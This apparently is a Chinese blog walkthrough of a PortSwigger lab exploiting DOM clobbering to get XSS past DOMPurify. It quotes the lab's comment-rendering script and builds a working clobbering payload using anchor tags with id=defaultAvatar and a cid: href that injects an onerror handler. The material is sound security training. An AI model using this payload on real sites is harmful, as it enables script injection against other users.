PortSwigger 基于dom的漏洞-利用 DOM 破坏来启用 XSS

进入实验随意进入一篇博客

我们可以尝试随意提交一些恶意代码看看会发生什么

很显然我们提交成功了但是我们的恶意代码貌似被过滤了

查看源码发现这里有一个过滤框架
我们打开源码分析
 

function loadComments(postCommentPath) {
    let xhr = new XMLHttpRequest();
    xhr.onreadystatechange = function() {
        if (this.readyState == 4 && this.status == 200) {
            let comments = JSON.parse(this.responseText);
            displayComments(comments);
        }
    };
    xhr.open("GET", postCommentPath + window.location.search);
    xhr.send();

    function escapeHTML(data) {
        return data.replace(/[<>'"]/g, function(c){
            return '&#' + c.charCodeAt(0) + ';';
        })
    }
//我们主要分析这里以下的代码上面是通过ajax重新将过滤后的页面展示在前端
    function displayComments(comments) {
        let userComments = document.getElementById("user-comments");

        for (let i = 0; i < comments.length; ++i)
        {
            comment = comments[i];
            let commentSection = document.createElement("section");
            commentSection.setAttribute("class", "comment");

            let firstPElement = document.createElement("p");
            //它先是在寻找是否有头像如果没有的话它会使用默认的头像
            let defaultAvatar = window.defaultAvatar || {avatar: '/resources/images/avatarDefault.svg'}
            let avatarImgHTML = '<img class="avatar" src="' + (comment.avatar ? escapeHTML(comment.avatar) : defaultAvatar.avatar) + '">';

            let divImgContainer = document.createElement("div");
            divImgContainer.innerHTML = avatarImgHTML

            if (comment.author) {
                //可以看到这是对提交连接的一个展示
                if (comment.website) {
                    let websiteElement = document.createElement("a");
                    websiteElement.setAttribute("id", "author");
                    websiteElement.setAttribute("href", comment.website);
                    firstPElement.appendChild(websiteElement)
                }
                //对用户提交的名称做了过滤
                let newInnerHtml = firstPElement.innerHTML + DOMPurify.sanitize(comment.author)
                firstPElement.innerHTML = newInnerHtml
            }
            //这里它使用了默认的时间
            if (comment.date) {
                let dateObj = new Date(comment.date)
                let month = '' + (dateObj.getMonth() + 1);
                let day = '' + dateObj.getDate();
                let year = dateObj.getFullYear();

                if (month.length < 2)
                    month = '0' + month;
                if (day.length < 2)
                    day = '0' + day;

                dateStr = [day, month, year].join('-');

                let newInnerHtml = firstPElement.innerHTML + " | " + dateStr
                firstPElement.innerHTML = newInnerHtml
            }

            firstPElement.appendChild(divImgContainer);

            commentSection.appendChild(firstPElement);

            if (comment.body) {
                let commentBodyPElement = document.createElement("p");
                                               //用框架过滤我们的评论内容
                commentBodyPElement.innerHTML = DOMPurify.sanitize(comment.body);

                commentSection.appendChild(commentBodyPElement);
            }
            commentSection.appendChild(document.createElement("p"));

            userComments.appendChild(commentSection);
        }
    }
};

通过分析我们知道了
对于提交的用户名称以及用户的评论的内容它使用了过滤框架对我们的提交内容做了过滤
对于提交的链接和邮箱它里面有正则对我们的提交的内容进行了限制
怎么办呢?
我们分析代码可以看到它在获取头像和展示头像时没有使用框架进行过滤

这里可以看到它本身是没有defaultAvarat这个值的
我们可以想一想这个值是不是可以被替换如果可以被替换那我们最终的代码是不是可以被放在img标签的src中
这里就是一个由于⾮标准化的 DOM ⾏为,浏览器有时可能会向各种 DOM 元素添加 name & id 属性,作为对⽂档或 全局对象的属性引⽤,但是,这会导致覆盖掉 document原有的属性或全局变量,或者劫持⼀些变量的内容


通过这个例子我们可以看出这是完全可行的

也就是说如果我们可以让window.defaultAvatar = 1" οnerrοr=alert(1)
然后放入到我们的img标签中我们是否就实现一个弹窗的效果
 

 let avatarImgHTML = '<img class="avatar" src="' + (comment.avatar ? escapeHTML(comment.avatar) : defaultAvatar.avatar) + '">';

我们可以看到这段代码最终是将defaultAvatar.avatar放在了img中
这是一个两个层级的关系所以我们应该实现
 

<img id="defaultAvatar"><img id="defaultAvatar" name="avatar">

让它通过defaultAvatar拿到两个标签然后通过avatar拿到我们写有恶意代码的标签
这样的话我们可以构造我们的恶意代码
 

<a id=defaultAvatar><a id=defaultAvatar name=avatar href="cid:&quot;onerror=alert(1)//">

cid是过滤框架允许使用的协议但是这个协议不对双引号进行url编码所以我们需要写实体编码

我们就ok了

相关推荐

  1. 【Web漏洞指南】DOM XSS

    2024-03-10 04:04:02       8 阅读
  2. <span style='color:red;'>DOM</span>

    DOM

    2024-03-10 04:04:02      22 阅读

最近更新

  1. TCP协议是安全的吗?

    2024-03-10 04:04:02       18 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-03-10 04:04:02       19 阅读
  3. 【Python教程】压缩PDF文件大小

    2024-03-10 04:04:02       18 阅读
  4. 通过文章id递归查询所有评论(xml)

    2024-03-10 04:04:02       20 阅读

热门阅读

  1. Kafka整理-Kafka Streams

    2024-03-10 04:04:02       22 阅读
  2. IoT技术有什么好处——青创智通

    2024-03-10 04:04:02       21 阅读
  3. 建造者模式

    2024-03-10 04:04:02       22 阅读
  4. windows下安装python virtualenv 虚拟环境

    2024-03-10 04:04:02       19 阅读
  5. tomcat跨域问题CORS踩坑点

    2024-03-10 04:04:02       20 阅读
  6. C/C++蓝桥杯之整除序列

    2024-03-10 04:04:02       19 阅读
  7. css关于relative和absolute的区别

    2024-03-10 04:04:02       25 阅读
  8. mac切换本地node版本

    2024-03-10 04:04:02       21 阅读